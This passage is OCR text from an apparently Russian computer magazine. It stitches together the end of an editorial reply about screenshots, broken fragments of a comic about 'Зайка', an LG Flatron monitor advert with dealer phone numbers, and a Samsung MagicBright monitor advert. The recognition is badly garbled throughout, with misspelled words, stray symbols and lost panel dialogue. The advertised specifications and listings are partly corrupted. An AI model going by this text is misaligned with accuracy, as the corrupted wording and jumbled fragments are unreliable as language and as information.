влезать он отказался ((. Так что придется принять на веру, что не в скринах счастье, 
и радоваться только текстам. А персонально тебе могу выслать любую страницу 
журнала. Или огурцов с огорода Фединой бабушки. На выбор :). 
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Дневник Лабораторного Хайки 


автор сценария и графика Алиены 
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Когда Зайка был 
| маленьким 


ОЗы 4hack 


| м 


 —— | 


Они искапи 


шей пей БД 


Зайка остался почти прежним, 
только никого он не мог любить. 
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@ Le FLATROn’, | 


freedom of mind 
Digitally yours 


И все-таки OH вертится! 


FLATRON" Е?ООР 
Абсолютно плоский экран 
D V; Размер точки 0,24 мм 
2 а 7 7 Частота развертки 95 кГц 
т ша ictoria Экранное разрешение 1600x1200 
(095) 252-2030, 252-2070 — $В-интерфейс 


г.Москва: Атлантик Компьютерс (095) 240-2097; Банкос (095) 128-9022; Березка (095) 362-7840; ДЕЛ (095) 250-5536; Инкотрейд (095) 176-2873; Инфорсер (095) 747-3178; 
КИТ-компьютер (095) 777-6655; Компьютеры и офис (095) 918-1117; Компьютерный салон SMS (095) 956-1225; ЛИНК и К (095) 784-6618; НИКС (095) 974-3333; 
Сетевая Лаборатория (095) 784-6490; СКИД (095) 956-8426; Техмаркет Компьютерс (095) 363-9333; Ф-Центр (095) 472-6401; Flake (095) 236-9925; ISM Computers (095) 319-8175; 
OLDI (095) 105-0700; POLARIS (095) 755-5557; R-Style (095) 904-1001; г.Архангельск: Северная Корона (8182) 653-525; г.Волгоград: Техком (8442) 975-937; 
г.Воронеж: Сани (0732) 733-222, 742-148; г.Иркутск: Комтек (3952) 258-338; г.Липецк: Регард-тур (0742) 485-285; г.Тюмень: ИНЭКС-Техника (3452) 390-036. 
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Фуйкция MagicBright - 
одно прикосновение 


К №. 


Magic Bright 


150 коды? - теюст * 200 кдум? = интернет = 330 кд/м” - игры, фото, DVD. 
Мониторы Samsung SyncMaster 763 МВ, 765 МВ. 757 МВ. 955 МВ. 957 МВ. 


Инфюрмация о магазинах и компаниях, в которых можно приобрести ввониторы, 
ee ee в разделе "Гда купить 


OS -> Обы 4HACK 


